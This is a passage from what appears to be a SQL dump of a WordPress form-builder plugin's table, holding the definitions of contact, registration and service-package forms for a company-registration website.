xlsx*:*w_extension*:*2000*:*w_max_size*:*yes*:*w_required*:*yes*:*w_multiple*:**:*w_class*:**:*new_field*:*64*:*id*:*type_editor*:*type*:*custom_64*:*w_field_label*:*<h2><span style=\"font-family: trebuchet ms,geneva,sans-serif; color: rgb(0, 204, 255);\" data-mce-style=\"font-family: trebuchet ms,geneva,sans-serif; color: #00ccff;\">Before you submit?</span></h2><p><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\">Review the details of your submission.</span><br><span style=\"font-family: comic sans ms,sans-serif;\" data-mce-style=\"font-family: comic sans ms,sans-serif;\"> Please be patient, after you submit the form, it will take 20-30 seconds to upload</span></p><hr>*:*w_editor*:**:*new_field*:*66*:*id*:*type_submit_reset*:*type*:*type_submit_reset_66*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*65*:*id*:*type_star_rating*:*type*:*Was the form easy to complete?:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*yellow*:*w_field_label_col*:*5*:*w_star_amount*:*no*:*w_required*:*wdform_star_rating*:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','1*:*show_hide*:*10*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*9*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*8*:*field_label*:*and*:*all_any*:*6***==***Yes*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*54*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*55*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*56*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*71*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*53*:*field_label*:*and*:*all_any*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*51*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*42*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*43*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*44*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*70*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*45*:*field_label*:*or*:*all_any*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*26*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*27*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*40*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Three*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*41*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*69*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*28*:*field_label*:*or*:*all_any*:*4***==***Two*:*next_condition*:*4***==***Three*:*next_condition*:*4***==***Four*:*next_condition*:**:*new_condition*:*','','','','','Company Registration Form','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'','','','none',0),(39,0,2,'Contact Us','embedded','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Enter your E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - CMS%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Extension%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Plugin%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Message%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - type_submit_reset_8%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#3#**id**#Message subject#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#','0','none','false','true','','','',1,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*First***Last*******:*w_first_val*:*First***Last*******:*w_title*:*Title*********Middle*:*w_mini_labels*:*250*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*Enter your E-mail:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*CMS*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*hor*:*w_flow*:*Joomla!***Wordpress*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Joomla!***Wordpress*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*5*:*id*:*type_own_select*:*type*:*Extension*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*500*:*w_size*:*Select value***Form Maker***Gallery WD***Spider Calendar*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*yes*:*w_required*:*no*:*w_value_disabled*:****Form Maker***Gallery WD***Spider Calendar*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*6*:*id*:*type_own_select*:*type*:*Plugin*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*500*:*w_size*:*Select value***Form Maker***Photo Gallery***Ecommerce WD*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*yes*:*w_required*:*no*:*w_value_disabled*:****Form Maker***Photo Gallery***Ecommerce WD*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*7*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*500*:*w_size_w*:*120*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','1*:*show_hide*:*5*:*field_label*:*and*:*all_any*:*4***==***Joomla!*:*next_condition*:**:*new_condition*:*1*:*show_hide*:*6*:*field_label*:*and*:*all_any*:*4***==***Wordpress*:*next_condition*:**:*new_condition*:*','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,4501,1,'Contact Us','You may contact us by filling in this form any time you need professional support or have any questions. You can also fill in the form to leave your comments or feedback.','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/2.png','flash',1),(40,0,2,'Contact Us','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - Enter your E-mail:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - CMS%</div><div wdid=\"5\" class=\"wdform_row ui-sortable-handle\">%5 - Extension%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Plugin%</div><div wdid=\"7\" class=\"wdform_row ui-sortable-handle\">%7 - Message%</div><div wdid=\"8\" class=\"wdform_row ui-sortable-handle\">%8 - type_submit_reset_8%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',9,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#3#**id**#Message subject#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#Enter your E-mail:#**label**#type_submitter_mail#****#4#**id**#CMS#**label**#type_radio#****#5#**id**#Extension#**label**#type_own_select#****#6#**id**#Plugin#**label**#type_own_select#****#7#**id**#Message#**label**#type_textarea#****#8#**id**#type_submit_reset_8#**label**#type_submit_reset#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*First***Last*******:*w_first_val*:*First***Last*******:*w_title*:*Title*********Middle*:*w_mini_labels*:*250*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*Enter your E-mail:*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*4*:*id*:*type_radio*:*type*:*CMS*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*left*:*w_field_option_pos*:*no*:*w_hide_label*:*hor*:*w_flow*:*Joomla!***Wordpress*:*w_choices*:*false***false*:*w_choices_checked*:*1*:*w_rowcol*:*yes*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Joomla!***Wordpress*:*w_choices_value*:*****:*w_choices_params*:**:*w_class*:**:*new_field*:*5*:*id*:*type_own_select*:*type*:*Extension*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:*Select value***Form Maker***Gallery WD***Spider Calendar*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*yes*:*w_required*:*no*:*w_value_disabled*:****Form Maker***Gallery WD***Spider Calendar*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*6*:*id*:*type_own_select*:*type*:*Plugin*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size*:*Select value***Form Maker***Photo Gallery***Ecommerce WD*:*w_choices*:*true***false***false***false*:*w_choices_checked*:*true***false***false***false*:*w_choices_disabled*:*yes*:*w_required*:*no*:*w_value_disabled*:****Form Maker***Photo Gallery***Ecommerce WD*:*w_choices_value*:***********:*w_choices_params*:*wdform_select*:*w_class*:**:*new_field*:*7*:*id*:*type_textarea*:*type*:*Message*:*w_field_label*:*500*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*500*:*w_size_w*:*120*:*w_size_h*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*8*:*id*:*type_submit_reset*:*type*:*type_submit_reset_8*:*w_field_label*:*Submit*:*w_submit_title*:*Reset*:*w_reset_title*:**:*w_class*:*true*:*w_act*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact Us','You may contact us by filling in this form any time you need professional support or have any questions. You can also fill in the form to leave your comments or feedback.','http://companyregistration.online/wp-content/plugins/form-maker/images/demo/2.png','flash',1),(41,0,12,'Contact Us','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Company:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Questions/Comments:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',5,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Questions/Comments:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact us','You may contact us on the form below.','http://companyregistration.online/wp-content/uploads/2016/03/contact-us-1.jpg','tada',0),(42,1,12,'Contact Us','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name:%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail:%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\" style=\"\">%3 - Company:%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\" style=\"\">%4 - Questions/Comments:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',2,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',5,1,'1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****##**id**##**label**##****#','1#**id**#Name:#**label**#type_name#****#2#**id**#E-mail:#**label**#type_submitter_mail#****#3#**id**#Company:#**label**#type_text#****#4#**id**#Questions/Comments:#**label**#type_textarea#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_name*:*type*:*Name:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:***********:*w_first_val*:***********:*w_title*:*Title***First***Last***Middle*:*w_mini_labels*:*100*:*w_size*:*normal*:*w_name_format*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no***no*:*w_name_fields*:*no*:*w_autofill*:**:*new_field*:*2*:*id*:*type_submitter_mail*:*type*:*E-mail:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*yes*:*w_required*:*no*:*w_unique*:**:*w_class*:*no*:*w_verification*:*E-mail confirmation:*:*w_verification_label*:**:*w_verification_placeholder*:*no*:*w_autofill*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Company:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*4*:*id*:*type_textarea*:*type*:*Questions/Comments:*:*w_field_label*:*100*:*w_field_label_size*:*top*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size_w*:*100*:*w_size_h*:**:*w_first_val*:**:*w_title*:*no*:*w_required*:*no*:*w_unique*:**:*w_class*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Contact us','You may contact us on the form below.','http://companyregistration.online/wp-content/uploads/2016/03/contact-us-1.jpg','tada',0),(45,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div></div><div class=\"wdform_column ui-sortable\"><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',7,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****#4#**id**#Contact Number#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****#4#**id**#Contact Number#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#','0','none','false','true','','','',0,'testmode','','',0,'1*:*id*:*type_text*:*type*:*Name*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Name*:*w_first_val*:*Name*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*3*:*id*:*type_text*:*type*:*Surname*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Surname*:*w_first_val*:*Surname*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*6*:*id*:*type_checkbox*:*type*:*Checkbox:*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*right*:*w_field_option_pos*:*no*:*w_hide_label*:*ver*:*w_flow*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices*:*false***false***false***false***false***false***false***false***false*:*w_choices_checked*:*1*:*w_rowcol*:*no*:*w_required*:*no*:*w_randomize*:*no*:*w_allow_other*:*0*:*w_allow_other_num*:*no*:*w_value_disabled*:*Income Tax registration***Name reservation***Company registration***Tax Clearance***BEE Affidavit***Share Certificate***Share register***Vat registration***PAYE registration*:*w_choices_value*:**************************:*w_choices_params*:**:*w_class*:**:*new_field*:*4*:*id*:*type_text*:*type*:*Contact Number*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*Contact Number*:*w_first_val*:*Contact Number*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*2*:*id*:*type_text*:*type*:*E-mail*:*w_field_label*:*100*:*w_field_label_size*:*left*:*w_field_label_pos*:*no*:*w_hide_label*:*200*:*w_size*:*E-mail*:*w_first_val*:*E-mail*:*w_title*:*yes*:*w_required*:*no*:*w_regExp_status*:**:*w_regExp_value*:**:*w_regExp_common*:**:*w_regExp_arg*:*Incorrect Value*:*w_regExp_alert*:*no*:*w_unique*:*no*:*w_readonly*:**:*new_field*:*',1,1,'*','','','','',1,'','','','','','','','','','','',1,1,1,1,'administrator,',1,'','',0,0,0,0,1,'Choose Your Options','','http://companyregistration.online/wp-content/uploads/2016/03/advance1600.png','fadeInLeft',1),(46,0,14,'Customize package','','','<div class=\"wdform-page-and-images\" style=\"display:table; border-top:0px solid black;\"><div id=\"form_id_tempform_view1\" class=\"wdform_page\" page_title=\"Untitled page\" next_title=\"Next\" next_type=\"text\" next_class=\"wdform-page-button\" next_checkable=\"false\" previous_title=\"Previous\" previous_type=\"text\" previous_class=\"wdform-page-button\" previous_checkable=\"false\"><div class=\"wdform_section\"><div class=\"wdform_column ui-sortable\"><div wdid=\"1\" class=\"wdform_row ui-sortable-handle\">%1 - Name%</div><div wdid=\"3\" class=\"wdform_row ui-sortable-handle\">%3 - Surname%</div><div wdid=\"4\" class=\"wdform_row ui-sortable-handle\">%4 - Contact Number%</div><div wdid=\"2\" class=\"wdform_row ui-sortable-handle\">%2 - E-mail%</div><div wdid=\"6\" class=\"wdform_row ui-sortable-handle\">%6 - Checkbox:%</div></div></div><div valign=\"top\" class=\"wdform_footer\" style=\"width: 100%;\"><div style=\"width: 100%;\"><div style=\"width: 100%; display: table; padding-top:10px;\"><div style=\"display: table-row-group;\"><div id=\"form_id_temppage_nav1\" style=\"display: table-row;\"></div></div></div></div></div></div></div>',1,'// Occurs before the form is loaded\r\nfunction before_load() {	\r\n}	\r\n// Occurs just before submitting  the form\r\nfunction before_submit() {\r\n	// IMPORTANT! If you want to interrupt (stop) the submitting of the form, this function should return true. You don\'t need to return any value if you don\'t want to stop the submission.\r\n}	\r\n// Occurs just before resetting the form\r\nfunction before_reset() {	\r\n}','','',1,'%all%','%all%',7,1,'1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#4#**id**#Contact Number#**label**#type_text#****#2#**id**#E-mail#**label**#type_text#****#6#**id**#Checkbox:#**label**#type_checkbox#****##**id**##**label**##****#','1#**id**#Name#**label**#type_text#****#3#**id**#Surname#**label**#type_text#****#4#**id**#Contact 